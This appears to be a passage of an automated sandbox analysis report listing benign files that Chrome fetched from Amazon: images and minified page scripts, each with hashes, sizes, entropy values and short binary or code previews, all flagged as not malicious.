                                                                                                                                                                                                                                                                      SSDEEP:768:LZVHpF7zYhg+vH8SzM7e8wUdyYzdBiC7LXozN1p+rnOSXkkNEKaEJrWJhZw:V9pF7zUogM7euHh7LM7WOUNEKpJKi
                                                                                                                                                                                                                                                                      MD5:A1072F5C25EB0C2D0D2B308EA9FD3C1C
                                                                                                                                                                                                                                                                      SHA1:B567447863FEAA00697781FC12BF3396328ED349
                                                                                                                                                                                                                                                                      SHA-256:8FB7678659ACA80D3D41C0A6F34C2843A840C20882E75A47E37CB35B8E82A3D6
                                                                                                                                                                                                                                                                      SHA-512:D8C9AF7F4129358E56FDDEAC0D560A0E1F1B6761706952BA9E669A76A7EFDF5D8494AC6E852E2B9118D892AF7FE55E74B3C4EDCB9E779B7E975BC0FB7B565ABE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................J..............................!.1."A..2Qa.#q..$....%39BR.CXv.....5TUb....................................@........................!..1A..."Qaq...#2.......3BRbr.$C..Vs..............?..C..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..1.S..)Lc..1.b..x.;...=...........w.#d..K.Q6....U.. ....]..z.b....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 160x37, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):644
                                                                                                                                                                                                                                                                      Entropy (8bit):7.666353118240485
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:12:EFNuOUxhudCevP12Vw2EXuHB+EvdP0fB5C+t1bhuuht3tLluYomRMFCeSl8WJ:RudCOAF5dd0vrdhRtL4qqFvBW
                                                                                                                                                                                                                                                                      MD5:036CA98903750DCBBE60C43B7B56BBF7
                                                                                                                                                                                                                                                                      SHA1:4BD8A1584481CF8FEB4A9E7017ED5402965E6E19
                                                                                                                                                                                                                                                                      SHA-256:19E877690620DD9C7D0EC5638260E9198389E7F96FF2F71F6C17CDD436D648E0
                                                                                                                                                                                                                                                                      SHA-512:86D204E8ABE33E3D149275439ABA62E152ED3584FC57A292A9E7467978689E7BEE837FFD87F053182AC2F67457B7FC62D482083DF00E3193CD1AD212CBD07ECA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/7c0c795f-4611-4e55-9ae6-d19245573000._CR0,0,600,100_AC_QL10_SX160_SY600_FMwebp_.jpg"
                                                                                                                                                                                                                                                                      Preview:RIFF|...WEBPVP8 p........*..%.?...N.&.!1..A.1....m.\^?~..7.....m..B...NXl..X........ve...J....4.ijP....U8aw..eQ.f.$.-..<....d.R....<+'.[./J...oA....iH.t..P_..0...".o5K.r.D.Z.3..). ...!....sW...`..u.A.X.....d_.M...jj.....t.#.8..[.#6.d........O.g.F..v:'?...R...bW.2.bKi|7DUC.j...U.....q.nF.`....R9u.`>.Jl...>y...n.e..w.....:.{.\_...+.5.....n.h^.:..Q_.b.CW.?....2.N....p..(.-]H4.;...rj.^-.X.Y.\.]........P%@q.v.(.S.@.%..F|....t.`..L!.......N6.U.p.|.....w.....a7./w8X#\*..7.....,.M.Q.'.3X....L[...J..=.._.$....V.m.B4..=#..wD.uQ.>....... `y..T`.....~.2.RRl;....N.....@..`F...t2...L.Q..T...1X.A..a(w..^\{..t.9.F...,.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 149x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):6233
                                                                                                                                                                                                                                                                      Entropy (8bit):7.940586856196309
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TWe8zjfmZ6MCl+7uxyKuQl+faQxNjey0uvjlxKT58bJ/p6Y/xshGRy4ZXya:SPnMCI7u9uA3QR0uBA+b1s8TXya
                                                                                                                                                                                                                                                                      MD5:DDB4416DE1284A59B794AC6E6C21C98C
                                                                                                                                                                                                                                                                      SHA1:6D83C8D210024582CC34589FD51A5FE4F81F158B
                                                                                                                                                                                                                                                                      SHA-256:129ACA17DBC4F604CB5291120F4EDBCFA15D07A0789639B7016BAC4D2FC33BEE
                                                                                                                                                                                                                                                                      SHA-512:28863BA8484042068A5FF0D1511C0C5CE227308D61270CD43B8994BA607BFDA09FEA30161BF2299524F576755BDF6E229B4887A55A5049EEEDF69FA61211F4A2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!1.."A..Qa#qu.....%346BRt...2Cbcdr....S.....$&e..................................................!1A..Qa"..............?..zG...]*'..l .....I..r...>.z.[.nZ.1q..?4.....w...:^'....n@!...y....Q.K.*....~,............Q....k...(=..nM....3..#.^..xp...6..'....Ao1.0..W...h..J...r3.,.L.@.L...X.6.i.E.gC.$.]C...k#.x.......$......g..0.Ez.V.pGun.g-..O1.k7.F.;........$....a..,..8.....W..S5........c.,u...S..B...I......=Cy.U..+.c.C.y&0.9.z..}....y4.#..U...H..=.8.....Rq...}.....x..8.'<..G.'$s.$..@.@...K*........y.;6.;..+..0O<`...H..0....N6.....%...1.(=..+.'..9..(..Y...P.G..`..!..t....g...c.y..g'.A.~...D.7...R...1....w."...$...;w}...q?C..7.H..M.?.!m...%..r{_\.z7.j...Ws.o`..z.......E6..?.e......~X3m.(...=......n=Rh.u0....^GwM.6T.g..ya.}.R..Y.G....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 264x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):19950
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958723930791472
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:hileUazNnDX83VreNIWjDTpWrrQOVHEmLxJPFgcaVbSWTGkQ4QRO:pUkb818IEXpa7ZLxJtgtbJTTB
                                                                                                                                                                                                                                                                      MD5:6AD04D5101A445EE77EE68C26622CE0A
                                                                                                                                                                                                                                                                      SHA1:E5BE5B2406572E6B2D7E6837908394DAA962D9E8
                                                                                                                                                                                                                                                                      SHA-256:FD33D12083484545BE8B26D5B2484751F71D15FDEB8D561356CB797C0E34680A
                                                                                                                                                                                                                                                                      SHA-512:368F52DC2F9FB83A477B00DE946510C1AAD57B6BF5A0D260BFE93D9D362D791327C2BC3DE0207FD43452AA6184CC4BFB951177DBEB2734F802486DE8E6432822
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71U06Q9P9YL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6....................................................................%"IH..OU`qM..+.I).JD..%.%"IH.k#Z0Z5n{..W61..X....I)..I....H.+.Y..-I..%.BY..........A.~.-.........B....#.b..AM%b......?.......w.JE..H.C....l_T.i+...q.sQ...POb"T4..S=.R.....x."......Z......!..2.cR.7.@.b]f."O\P.=..Y7..O.JO0..*....T..$..S.K. .p.;D._A.R./a..[.m..<.C.Xi7..c...W..cA..........a.PO...C.Z...^vEmd..$....M..._c.cd..%.~^..,\q.VS(.....l..\y'N.o.y.}._.u.,..N.>r.{..a..o.r..Zcw..F.......:..++,.2"...u`.Y.p.r.e...D..u..a.%..Hej.dU..t.O.\....E.9.=...n.&../.f...j..;......m....../....O.........h.......S.U5...e...pE?].!\t#..3....F...K.l{-NXd.'...i....F.!!.C ,.1..#..)+..Wi...x..U.,-[.-..o?..T.....pe.R]..r.L%J.=.;Q6[.3....^.n.@..oi...zOw.1..x.^7yXJ.....9..c.t)...X.../...a..A.N$...KG.St.\{.kwF.....c}
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x248, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):14432
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9438494173544365
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:pmwuUGAi+fiB2XB5eww6Q/OMn4nWQWHEC8Y:QGjiwxO//OW4niHl8Y
                                                                                                                                                                                                                                                                      MD5:0D83CBCB7B53014ACFDE89E76E162A19
                                                                                                                                                                                                                                                                      SHA1:3C143C6C0DAE6EC259BF57367594A8AE85022611
                                                                                                                                                                                                                                                                      SHA-256:250866EE69D664586B1C5E9D718E5E517296363FEB0632505140AA47119DB0CA
                                                                                                                                                                                                                                                                      SHA-512:56F2E81D1BB07E807FF81836039076E51AC5ACD2AE11AE9E945CB96D79E9EECAF08BB7CC529753F1F98F40A6A7F41C14BF4CDE7AC76DA59958238BACE882E2CD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61fWN96Xa8L._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........6............................................................................f..../...7.%..iG+m...W/J...i.9_.t............~G)..+D*.v....O...o..x.f.S....~ef.+K...!g.<..g+.Q.{..J..................h....T.\..M~H..ub.KDmr"M..vo7JI........_j.X.MI.Kd....50.g........0...m..y..a=.|.nOyB........9.......vE...=2{...w.M?..z..T3.'<i.3G]...F.s.W...7.....)x.rG.Kn.W....'...bg..!.naX...0.[J..ckLh..t.j7...P...|...%(...Y.}...[...C.GwpK9.K...J.+.x..O.w<....x........g....tH..?sv.....T./>|....BdIQ;...u....q.........ex`.....6s.p.r-..;./n}..s..1=V.........~.....vf..TogQ.. ....B.GdSU...|..uO2v.,g...../E"....F.e...W.... ..e...\..8.U.....D...e.l.....O..G..._.d.g.rg0...l.v...cS...Y..e.. .......G..^)........u.Y~W?..qdJ..i.2..Z.........^..a......z.........|z*=|<..|..;.....s|.3F.G.6N/w.5.I*s..9._~g^.>....SB.........
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 174x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18517
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970801562471845
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:9Ofyln+XpCdA+gqj+PfFdXA8oR9rjE64kVoSVnA6vbLFd0:gUni+gqyfFdIPhDPA
                                                                                                                                                                                                                                                                      MD5:8CBF938E76DC4152352E58A8C2FB9F34
                                                                                                                                                                                                                                                                      SHA1:1628EDF3A3930355FEE8BEC16461CA2EB26593A9
                                                                                                                                                                                                                                                                      SHA-256:44F88D64142D8295BEE2BCC0F3D3024F5567C7ABB846F433F654A9729F053FC8
                                                                                                                                                                                                                                                                      SHA-512:48FD7DD71094148F65072ABC8D4BF754A91C861D0A9519B1F362282AE7F0742BE5AE332471E2A1C8797A56F95F7B597B4F5471A7F212938678724818C6A43833
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71hQvoIrncL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."...............................................................!..1."A..#2Qrs..35aq..Bb..4R.....$Su..6t.....%7CDcv......................................................!1.A.3Bq."4Q..2Da....#.............?.r..Q]..gE.K..V..k.1W.....3..0tEE..D...... 7E.UU..o4.,q..;.EQ.$..WY.l9. aH....F....v..D..j*....3.hO.WD..>....2.."*5%.].D.$..g...SOQ4...h..SI.i...J.rX....h.D...E.....2..(..+.3O*...(F..`..lV..O_...;O6uUX.SI...R.~..S.d......7j#8H..Fm...........p.......~SPk.....i...9.Z5e....VB.=.j51...........Y=.../.e.5..f..RY...T.. o*.q?E..R..0..i..f,U...7.q....$.(.....I.P.SAM/....l.QyND..e2/.%...,..l....Eb}.J..~:tx..........e._..lqL.....0..q....vm....~...#..>.J.a.*|X..E...T.E..........l>).q..>W.k.ud5Z......{j.M.lv.W.b..~...Q.U.Y].@...........dp.;VI.1......o.....D...6....A.1...1..b..&9..7... .......$y.X.=....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (596)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):739306
                                                                                                                                                                                                                                                                      Entropy (8bit):5.577313480445711
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:iu6Pm2tOPdA7gBQ9DtRqcgNTilgo1Y3vKH9aGauo/m9tfnt8Tc:iTPmE7IQ9DtRqcgMlgo1Y3SHrcWqc
                                                                                                                                                                                                                                                                      MD5:BEBE82BD28FE3E03BEF91CB28C29A4AC
                                                                                                                                                                                                                                                                      SHA1:CD482EC9E72BAA6395A1294052D0C3F36D1CA59F
                                                                                                                                                                                                                                                                      SHA-256:96E6C100A8F0EC1EA06DF3DFAE74F4E0F67BEB00A2935618F4CF61A9C6E50E6F
                                                                                                                                                                                                                                                                      SHA-512:F4429904666069646097AC37276F901D66BD2F4DD830CA31C6D5B62358D26371D0474AF2F583E19D3B4D0EDE8C847C7ECDC13AB8DED551E5913638FE0812693A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://images-eu.ssl-images-amazon.com/images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xgcL-oXCL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&4c3EyOfv"
                                                                                                                                                                                                                                                                      Preview:(function(y){var f=window.AmazonUIPageJS||window.P,p=f._namespace||f.attributeErrors,d=p?p("NavSharedAssets",""):f;d.guardFatal?d.guardFatal(y)(d,window):d.execute(function(){y(d,window)})})(function(y,f,p){(function(d){if(!d.$Nav||d.$Nav._replay){document.createElement("header");var a=function(){this.data={}},c=function(a){c.manager.add(a)};a.arrayAdder=function(a){return function(){this.data[a]=(this.data[a]||[]).concat([].slice.call(arguments));return this}};a.prototype={build:function(a,b){this.data.name=.a;this.data.value=b;this.data.immediate=!1;this.data.process=!0;c.manager.add(this.data)},run:function(a,b){b&&(this.data.name=a);this.data.value=b||a;this.data.process=!0;c.manager.add(this.data)},publish:function(a,b){this.data.name=a;this.data.value=b;c.manager.publish(this.data)},declare:function(a,b){this.data.name=a;this.data.value=b;c.manager.add(this.data)},when:a.arrayAdder("when"),iff:a.arrayAdder("iff"),filter:a.arrayAdder("filter"),observe:a.arrayAdder("observe")};var
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (592)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):259505
                                                                                                                                                                                                                                                                      Entropy (8bit):5.513895391206618
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:OXoXk8Hk3BVobj3ECtbkwNHNFgkP6GctQE9vDUoNtEB7l62O9xqfLPl4b3asjneJ:OXoXkCSjob0xcd4b3asjeIZdBET01a
                                                                                                                                                                                                                                                                      MD5:EA332AA0E4574CE35E0407A1007453F4
                                                                                                                                                                                                                                                                      SHA1:157F430E39FF13ED9AC9B7B6295418ADFF4D89AB
                                                                                                                                                                                                                                                                      SHA-256:2EB99FD1CC80353D1BC041D7A198D441D59A6FB550D42C6E1B49B6D86378B683
                                                                                                                                                                                                                                                                      SHA-512:0A425ADE876E55A887136785B9C0016DE9164476BFBA3ED70247EBCF66369AC10BA1C597BD8D2A87DAAF32AF7825894554695F15345AD9B68086CA3EA886F9A3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:(function(c){var b=window.AmazonUIPageJS||window.P,d=b._namespace||b.attributeErrors,a=d?d("ProductUIAssets@addToCart",""):b;a.guardFatal?a.guardFatal(c)(a,window):a.execute(function(){c(a,window)})})(function(c,b,d){});./* ******** */.(function(v){var g=window.AmazonUIPageJS||window.P,w=g._namespace||g.attributeErrors,b=w?w("ProductUIAssets@digitalBundleSubscriptionTerms",""):g;b.guardFatal?b.guardFatal(v)(b,window):b.execute(function(){v(b,window)})})(function(v,g,w){!function(b){function d(a){a.when("A","jQuery","upsell-container-side-sheet","upsell-container-events","puis-upsell-metric-utils","ready").register("mou-sidesheet-event-handler",function(c,a,b,f,e){c.declarative("puis-upsell-sidesheet-action","click",function(a){var k=.a.data.preloadDomId;a.$event&&(a.$event.stopPropagation(),a.$event.preventDefault());b.showSheet(k);e.registerMetric(f.SIDE_SHEET_CLICKED,1);c.trigger(f.SIDE_SHEET_CLICKED,a)});c.declarative("puis-upsell-sidesheet-overlay","click",function(c){b.hideSheet(c
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):39516
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972024116551709
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                                                                                      MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                                                                                      SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                                                                                      SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                                                                                      SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x307, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):23553
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961040887697002
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:uyI9yYxaMMJGGIgg6uJqwb6ZDu6oQu4cLmNmdSDOVmyMZOknGe1z1XYRHuI895z:uxVnGlgJqc6ZDu6ZVcLmAdSq/KjVnOvs
                                                                                                                                                                                                                                                                      MD5:71CB15C3B6364151FCFD467631F8BABA
                                                                                                                                                                                                                                                                      SHA1:5AB84C35E98A51CA025FAD7BDA7E3A4C0169AD3C
                                                                                                                                                                                                                                                                      SHA-256:641BC106A0E8CBD6B3AEA74D971A24CD2386429B78E4D616C3122367C079B094
                                                                                                                                                                                                                                                                      SHA-512:1431FC5E88EEA7691DCD701E8D0486175BE86205B2B7DECFB1451B2E728C6C1B9FB74EC92B5402630E531456246A565EEE86AD3F97740C27C6C720417EADFBFC
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......3.@.."..........6................................................................................r...sI..A.r....G..]W.gOx..Q..-.:`.P.~..(..x..w.......@..........>.O..2=......v.&..<{J...^L.l.s.DE........4...........na.,..u.j...\.,..K.=.....y...{"b....)mpUo.6..V.v..gQ.wkq...=.T.6.x.,.N.U.n&RZ...Z).f..N!.......G..A..N..A:.'.dC.Ks!.M..ffd...z.T...F.Q.s.[.....-&..}s7QIq<x...5Z..yfr`7.T\.%..y..9.]zP=s"..@..-FF....L|.G{.........1..B...w......-....<tG....t..QL.8.D.............!.Y........%Q....^...Y.....#.m.g...}[.,..KsuL....|.r76y6..o.?;~...tlt.H...:^.....V..{....}.f.[b.n^....#...\d...$..W+..ySc.'.>....._8.iN...9.........X.Nb.P.oe......C.......rnr....V$..".J....k..].uy).0... .~...\.e.v.a.gw6...7:~..eO~...oP^..zUj#Nm.g.WvUo{[3.=.Y...):..d.#....... .........5.&6.....'...R.OZ."..b..v..Y.P........[QcYXu..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):3914
                                                                                                                                                                                                                                                                      Entropy (8bit):7.719265662082426
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:T5fTEsQOpQeNNOeKR2OsCsJ3o7RKJb/AZee3oPNlqGsEn:9fnQ4fRW29J3IRxZeeYPLsEn
                                                                                                                                                                                                                                                                      MD5:BC77D0B7A0050AB9DC9563FDF4B3F3F7
                                                                                                                                                                                                                                                                      SHA1:A540EAA725361E2AF5F2D39438D64836621992A6
                                                                                                                                                                                                                                                                      SHA-256:77FCDE3A88D75DD46D52B052AB7A45F697C156B2F2E0DBA85041E378A5425A9F
                                                                                                                                                                                                                                                                      SHA-512:B2842A7414DAB0C46073DED89D0E1B1343E4AE0542EE24A7B162F57697BDDFA5743CDFABCB0BFAC23B867F0A70631BCF02F677232B7F07F2CFB29A26433D7DF8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2...............................................................,..............F..b%.,D.%.M1?@:....Ac..rr....../:|PQ...U..._(-.......O1.XN@U...].RE.O.?{b......+._..Oh...Y.I..;...q..?"i.p..D...q&wx}....&.. .....v#....o..t.T./...l..ZzL'...+.....gRy.&.d.d:......8.....w.;.pq.N.'..F...x....jc+...f............6...=.)..(....4+".V7CQk......j.~.uU.X.......).s..h.......^O1....j._e9.B.......^.v.........5.y<...@...J!....[.....efB.G*.=\..........`.y#.1..U..X;...\...dOH...~,R..........5...h.....8..mg....m.|27`...|-^.~.+.........;.....0.2.1G..L}..6z.ty.`.|.>}..?c..#.ep.....................................................!01... 2.."3..ABQ#`p............a$72x..]N...]N...]N.uj`..".T..R..H..".T..b..5..j..!._.dg.Ei*.$..[S.....)O..".,..~{.4..$.....|.f..,.d... .N...QWV..n.1H.9.....E.bX.(.1.=z..'G.4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 194x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):17386
                                                                                                                                                                                                                                                                      Entropy (8bit):7.971713661182734
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:JUcmXhN6RZjXoTPqp55WLsiezBAL7qxANuVjAKh+Yd:EcJUPq/5Li13wd
                                                                                                                                                                                                                                                                      MD5:EB75FB05C12CD16CF99139F3C55A3FFF
                                                                                                                                                                                                                                                                      SHA1:631713C03B4CB099AD5DE773EB71C2D479D05365
                                                                                                                                                                                                                                                                      SHA-256:29584E56D34D57493839A07B2067668192037DF524FC7E4443752754D26622BA
                                                                                                                                                                                                                                                                      SHA-512:94A949D056A156AA27087B4DD6201ECE0AE51157232D417A4FAEFF14FCC413CE2FA04811F8469549A81B044E52DB427FFAACACAB858F781C31A06831508D56F6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71VOSLOz4+L._AC_SY200_.jpg
